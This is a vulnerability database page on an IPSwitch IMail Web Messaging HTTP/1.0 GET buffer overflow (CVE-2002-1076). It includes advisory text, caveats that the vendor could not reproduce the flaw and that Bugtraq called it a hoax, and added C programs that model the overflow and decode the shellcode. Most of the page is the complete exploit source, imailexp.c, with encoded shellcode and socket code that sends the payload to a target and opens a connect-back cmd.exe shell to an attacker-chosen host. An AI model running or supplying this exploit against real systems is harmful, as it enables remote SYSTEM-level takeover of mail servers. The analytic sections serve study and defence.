IPSwitch IMail Web Messaging Daemon HTTP GET Remote Buffer Overflow Vulnerability
Vulnerability ID | 1106873 | Type | Unknown (described below as a buffer overflow) |
Published | 2002-07-25 | Updated | 2005-05-02 |
CVE | CVE-2002-1076 |
CNNVD ID | CNNVD-200210-145 |
Platform | Windows | CVSS score | 7.5 |
|Source
|Details
IMail is a commercial e-mail server developed and maintained by Ipswitch and runs on Microsoft Windows. Its Web Messaging daemon does not bounds-check the parameter of an HTTP/1.0 GET request before copying it into a fixed-size buffer. A remote attacker who submits a GET whose parameter exceeds 96 bytes overflows that buffer, and a carefully constructed string can execute arbitrary instructions with the privileges of the Web Messaging daemon process. HTTP/0.9 and HTTP/1.1 GET requests are reported not to trigger the overflow. Two caveats from the references below: Ipswitch stated that it could not reproduce the issue and advised against the third-party patch that accompanied the exploit, and the Bugtraq follow-ups are titled "Hoax Exploit", so the 96-byte threshold and the privilege claim are the original poster's and not vendor-confirmed.
|Exploit
source: http://www.securityfocus.com/bid/5323/info
IMail is a commercial email server software package distributed and maintained by Ipswitch, Incorporated. IMail is available for Microsoft Operating Systems.
The web messaging server is vulnerable to a buffer overflow. When the server receives a request for HTTP version 1.0, and the total request is 96 bytes or greater, a buffer overflow occurs. This could result in the execution of attacker-supplied instructions, and potentially allow an attacker to gain local access.
** Ipswitch has reported they are unable to reproduce this issue. In addition, Ipswitch has stated that the supplied, third party patch may in fact open additional vulnerabilities in the product. Ipswitch suggests that users do not apply the supplied patch.
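The description above says a GET that exceeds 96 bytes overruns a fixed buffer on the HTTP/1.0 path only, and the exploit listing that follows sketches the frame as <96 bytes><EBP><EIP>. The C program below is an added example written for this page; it is not code from the page, from Ipswitch or from the exploit author. It models that request-line handling in its vulnerable and its hardened form. The 96-byte buffer and the HTTP/1.0-only condition come from the page; the frame layout (saved EBP at offset 96, saved EIP at offset 100), the parser shape, the 414 response and every function name are assumptions made for illustration. The unbounded copy is replayed into a heap image of the frame rather than on the real stack, so the program reports which request bytes would land on the saved return address without crashing itself.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Model only (added example): sizes and layout come from the advisory text and
 * the exploit comment, not from IMail itself. */
#define TARGET_BUF 96                 /* fixed buffer size given on the page */
#define EIP_OFF    (TARGET_BUF + 4)   /* <96 bytes><EBP><EIP>: saved EIP at 100 */

enum http_version { HTTP_UNKNOWN, HTTP_09, HTTP_10, HTTP_11 };

/* Split "GET <target> HTTP/x.y\r\n" into target pointer/length and version.
 * Nothing is copied here. */
static enum http_version split_request_line(const char *line,
                                            const char **target, size_t *len)
{
    if (strncmp(line, "GET ", 4) != 0)
        return HTTP_UNKNOWN;
    const char *t = line + 4;
    size_t n = strcspn(t, " \r\n");
    *target = t;
    *len = n;
    if (t[n] != ' ')
        return HTTP_09;                  /* "GET /x": no version field at all */
    if (strncmp(t + n + 1, "HTTP/1.0", 8) == 0)
        return HTTP_10;
    if (strncmp(t + n + 1, "HTTP/1.1", 8) == 0)
        return HTTP_11;
    return HTTP_UNKNOWN;
}

/* Vulnerable pattern: the HTTP/1.0 path copies the target into a 96-byte stack
 * buffer with no length check. The copy is replayed into a zero-filled heap
 * image of the frame and the little-endian value that would now occupy the
 * saved return address is returned (0 means the copy never reached it). */
uint32_t vulnerable_copy_saved_eip(const char *line)
{
    const char *target;
    size_t len;
    if (split_request_line(line, &target, &len) != HTTP_10)
        return 0;                        /* assumed: 0.9 and 1.1 use a bounded path */
    unsigned char *frame = calloc(EIP_OFF + 4 + len + 1, 1);
    if (frame == NULL)
        return 0;
    memcpy(frame, target, len);          /* the unbounded copy */
    frame[len] = '\0';
    uint32_t eip = (uint32_t)frame[EIP_OFF]
                 | (uint32_t)frame[EIP_OFF + 1] << 8
                 | (uint32_t)frame[EIP_OFF + 2] << 16
                 | (uint32_t)frame[EIP_OFF + 3] << 24;
    free(frame);
    return eip;
}

/* Hardened form: check the length against the destination before copying and
 * refuse oversized targets with 414. Returns the HTTP status to answer with. */
int hardened_handle(const char *line, char *out, size_t outlen)
{
    const char *target;
    size_t len;
    if (split_request_line(line, &target, &len) == HTTP_UNKNOWN)
        return 400;
    if (len >= outlen)                   /* keep room for the terminator */
        return 414;
    memcpy(out, target, len);
    out[len] = '\0';
    return 200;
}

/* Same check with the same 96-byte destination the model uses. */
int hardened_status(const char *line)
{
    char buf[TARGET_BUF];
    return hardened_handle(line, buf, sizeof buf);
}

/* Constructed request: a 104-byte target whose last four bytes are the
 * exploit's ret value 0x10012490, placed so that they land on the saved EIP. */
static void build_long_request(char *line, size_t linelen, const char *version)
{
    char target[105];
    memset(target, 'A', 100);
    memcpy(target + 100, "\x90\x24\x01\x10", 4);
    target[104] = '\0';
    snprintf(line, linelen, "GET %s %s\r\n\r\n", target, version);
}

uint32_t demo_saved_eip(const char *version)
{
    char line[160];
    build_long_request(line, sizeof line, version);
    return vulnerable_copy_saved_eip(line);
}

int demo_hardened_status(const char *version)
{
    char line[160];
    build_long_request(line, sizeof line, version);
    return hardened_status(line);
}

int main(void)
{
    printf("HTTP/1.0: saved EIP would become 0x%08x; hardened handler answers %d\n",
           (unsigned)demo_saved_eip("HTTP/1.0"), demo_hardened_status("HTTP/1.0"));
    printf("HTTP/1.1: saved EIP would become 0x%08x; hardened handler answers %d\n",
           (unsigned)demo_saved_eip("HTTP/1.1"), demo_hardened_status("HTTP/1.1"));
    printf("GET /index.html HTTP/1.0: hardened handler answers %d\n",
           hardened_status("GET /index.html HTTP/1.0\r\n\r\n"));
    return 0;
}
```

Run as is, it reports that the constructed 104-byte HTTP/1.0 target would leave 0x10012490 in the saved return address (the test target deliberately ends with the four bytes the exploit uses for its ret), that the same request over HTTP/1.1 never reaches it, and that the hardened handler answers 414 to both and 200 to a short GET /index.html.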
/*
imailexp.c
July 25th, 2002
IPSwitch IMail 7.11 remote 'SYSTEM' exploit
there is an overflow in the GET parameter under the HTTP/1.0
specification in the Web Messaging daemon in all IMail versions
to date
<96 bytes><EBP><EIP>
since none of the registers point to our payload on ret some
trickery was necessary to hit our payload in a dynamic way,
but nothing difficult..
execution flow:
eip overran, ret (esp-4) -> land at pop ebx, ret10 (esp-18) -> call esp
reach corrupted payload
preserve esp -> sub esp -> jmp esp
preserve esp, and jump to good payload
recover esp -> execute shell
let shit fly
"In 1995, Ipswitch released IMail Server, the first commercial NT Mail Server.
Seven years later there are over 49 million users of IMail worldwide.
IMail Server 7.1
Greater security, improved usability, and new revenue opportunities for service
providers."
7 years in development, 20 minutes of BuffSex v0.3(tm), 4 remote 'root' holes
2c79cbe14ac7d0b8472d3f129fa1df55 ([email protected])
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>
#include <unistd.h>
// dark spyrit's shell as per usual.. queerly modified to call ExitThread
// yet again.. all that shit on top is to get us home
unsigned char payload[] =
"\x47\x45\x54\x20\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x24\x01\x10\x90\x90\x90\x90\x13\xf7\x02\x10"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x8b\xfc\x81\xc4\x11\x11\x11\x11\x81\xec"
"\x50\xdd\x10\x11\xff\xe4\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x8b\xe7\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xdb\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\xc9\x1d\xdc\x95\x20\x48\x54\x54\x50\x2F\x31\x2E\x30\x0d"
"\x0a\x0d\x0a";
int main(int argc, char **argv)
{
    unsigned int ah;            /* listener address, 4 raw bytes, XOR-masked */
    unsigned short ap;          /* listener port in network order, XOR-masked */
    int fd;
    struct sockaddr_in sin;
    struct hostent *he;
    struct in_addr in;

    printf("IMail 7.11 remote exploit (SYSTEM level)\n");
    printf("2c79cbe14ac7d0b8472d3f129fa1df55 ([email protected])\n\n");
    if (argc < 5) {
        printf("usage: %s <targethost> <iwebport> <localhost> <localport>\n\n", argv[0]);
        printf("iwebport: IMail Web Messaging port (default 8383)\n\n");
        exit(-1);
    }

    /* The connect-back port and address live inside the XOR-0x95 encoded
     * shellcode, so they are stored masked at their fixed offsets. */
    ap = htons(atoi(argv[4]));
    ap ^= 0x9595;
    if ((he = gethostbyname(argv[3])) == NULL) { herror(argv[3]); exit(-1); }
    memcpy(&ah, he->h_addr, sizeof ah);    /* 4 bytes only; the old long deref over-read on 64-bit */
    ah ^= 0x95959595;
    payload[747] = ap & 0xff;
    payload[748] = (ap >> 8) & 0xff;
    payload[752] = ah & 0xff;
    payload[753] = (ah >> 8) & 0xff;
    payload[754] = (ah >> 16) & 0xff;
    payload[755] = (ah >> 24) & 0xff;

    if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("socket error"); exit(-1); }
    if ((he = gethostbyname(argv[1])) != NULL) {
        memcpy(&in, he->h_addr, he->h_length);
    } else if (inet_aton(argv[1], &in) == 0) {    /* inet_aton returns 0 on failure, not -1 */
        printf("unable to resolve host\n");
        exit(-1);
    }
    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_addr = in;
    sin.sin_port = htons(atoi(argv[2]));

    printf("ret: 0x10012490 (IMailsec.dll v.2.6.17.28)\n\n");
    printf("connecting...");
    if (connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0) { perror("connection error"); exit(-1); }
    printf("done.\n");
    sleep(1);
    printf("dumping payload...");
    /* sizeof - 1 drops the string terminator; the payload itself contains no NUL bytes */
    if (write(fd, payload, sizeof(payload) - 1) < (ssize_t)(sizeof(payload) - 1)) { perror("write error"); exit(-1); }
    printf("done.\n\n");
    printf("cmd.exe spawned to [%s:%s]\n\n", argv[3], argv[4]);
    close(fd);
    return 0;
}
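The listing patches payload[747..748] and payload[752..755] after XOR-masking the listener port and address with 0x95, and its decoder stub (the bytes 80 30 95, xor byte [eax],0x95) undoes that mask at run time. The following C program is an added example, not part of the page or of the exploit author's code; it is the kind of check a practitioner would run before believing a payload like this does what its comments claim. It embeds two fragments copied verbatim from the payload array above, bytes 738..755 (the region around the patch points) and bytes 911..1119 (the masked region that ends just before the plaintext " HTTP/1.0\r\n\r\n"), unmasks them, and reports the connect-back socket address and the Win32 API and library names the shellcode resolves. Reading the first fragment as three mov-immediate stores into a sockaddr_in is my interpretation of the decoded opcodes; the listener 10.1.2.3:4444 used in the round-trip check is constructed test data.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MASK 0x95   /* XOR key used by the decoder stub and by the exploit's patch lines */

/* payload[738..755] from the listing; the exploit writes the port at 747..748
 * and the address at 752..755, i.e. offsets 9 and 14 of this fragment. */
static const unsigned char SOCKADDR_FRAG[] =
    "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94";
#define PORT_OFF 9
#define ADDR_OFF 14

/* payload[911..1119] from the listing: the masked string table that ends just
 * before the plaintext " HTTP/1.0\r\n\r\n" tail. */
static const unsigned char API_TABLE[] =
    "\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
    "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
    "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
    "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
    "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
    "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
    "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
    "\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95"
    "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
    "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
    "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
    "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
    "\xf0\xed\xf0\x95";
#define TABLE_LEN (sizeof API_TABLE - 1)

/* Decoded opcodes around the patch points should read: mov word [edi],2
 * (AF_INET); mov word [edi+2],imm16 (port); mov dword [edi+4],imm32 (address). */
int frag_layout_ok(const unsigned char *frag)
{
    static const unsigned char op[] = {0x66, 0xc7, 0x07, 0x02, 0x00, 0x66, 0xc7, 0x47, 0x02,
                                       0, 0, 0xc7, 0x47, 0x04};
    for (int i = 0; i < 14; i++)
        if (i != PORT_OFF && i != PORT_OFF + 1 && (frag[i] ^ MASK) != op[i])
            return 0;
    return 1;
}

/* Port in host order (the immediate is stored in network order) and dotted address. */
uint16_t recover_port(const unsigned char *frag)
{
    return (uint16_t)(((frag[PORT_OFF] ^ MASK) << 8) | (frag[PORT_OFF + 1] ^ MASK));
}
void recover_addr(const unsigned char *frag, char out[16])
{
    snprintf(out, 16, "%d.%d.%d.%d", frag[ADDR_OFF] ^ MASK, frag[ADDR_OFF + 1] ^ MASK,
             frag[ADDR_OFF + 2] ^ MASK, frag[ADDR_OFF + 3] ^ MASK);
}
const char *default_addr(void)
{
    static char addr[16];
    recover_addr(SOCKADDR_FRAG, addr);
    return addr;
}

/* What the exploit's payload[747..755] assignments do: store the new listener
 * pre-masked so the stub's XOR loop yields the real bytes at run time. */
void patch_connback(unsigned char *frag, uint16_t port, const unsigned char ip[4])
{
    frag[PORT_OFF] = ((port >> 8) & 0xff) ^ MASK;
    frag[PORT_OFF + 1] = (port & 0xff) ^ MASK;
    for (int i = 0; i < 4; i++)
        frag[ADDR_OFF + i] = ip[i] ^ MASK;
}
/* Patch the constructed listener 10.1.2.3:4444 in and read it back. */
int demo_patch_roundtrip(void)
{
    unsigned char frag[18];
    char addr[16];
    const unsigned char ip[4] = {10, 1, 2, 3};
    memcpy(frag, SOCKADDR_FRAG, sizeof frag);
    patch_connback(frag, 4444, ip);
    recover_addr(frag, addr);
    return frag_layout_ok(frag) && recover_port(frag) == 4444 && strcmp(addr, "10.1.2.3") == 0;
}

static char table[TABLE_LEN + 1];   /* decoded string table, NUL-separated */
static int table_count = -1;
/* Decode the table once; returns the number of NUL-terminated entries. */
int api_name_count(void)
{
    if (table_count < 0) {
        table_count = 0;
        for (size_t i = 0; i < TABLE_LEN; i++) {
            table[i] = (char)(API_TABLE[i] ^ MASK);
            if (table[i] == '\0')
                table_count++;
        }
    }
    return table_count;
}
/* i-th decoded entry (API or library name), or NULL when out of range. */
const char *api_name(int i)
{
    const char *p = table;
    if (i < 0 || i >= api_name_count())
        return NULL;
    while (i-- > 0)
        p += strlen(p) + 1;
    return p;
}
```

Decoding the first fragment gives 192.168.0.1 on port 5555, the defaults the exploit overwrites from argv[3] and argv[4]; the second gives GetProcAddress, LoadLibraryA, CreatePipe, GetStartupInfoA, CreateProcessA, PeekNamedPipe, GlobalAlloc, WriteFile, ReadFile, Sleep, an 11-byte "xxxxxxxxxxx" placeholder, CloseHandle, WSOCK32, WSAStartup, socket, closesocket, connect, send, recv and cmd.exe, consistent with the connect-back cmd.exe shell the comment attributes to dark spyrit. Call api_name_count() and api_name(i) from a main() of your own to list them, and demo_patch_roundtrip() to see the exploit's patching step reproduced.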
|References
Source: BID
Name: 5323
Link: http://www.securityfocus.com/bid/5323
Source: XF
Name: imail-web-messaging-bo(9679)
Link: http://www.iss.net/security_center/static/9679.php
Source: support.ipswitch.com
Link: http://support.ipswitch.com/kb/IM-20020731-DM02.htm
Source: support.ipswitch.com
Link: http://support.ipswitch.com/kb/IM-20020729-DM01.htm
Source: BUGTRAQ
Name: 20020729 Re: Hoax Exploit (2c79cbe14ac7d0b8472d3f129fa1df55 RETURNS)
Link: http://archives.neohapsis.com/archives/bugtraq/2002-07/0368.html
Source: BUGTRAQ
Name: 20020729 Hoax Exploit
Link: http://archives.neohapsis.com/archives/bugtraq/2002-07/0363.html
Source: BUGTRAQ
Name: 20020725 IPSwitch IMail ADVISORY/EXPLOIT/PATCH
Link: http://archives.neohapsis.com/archives/bugtraq/2002-07/0326.html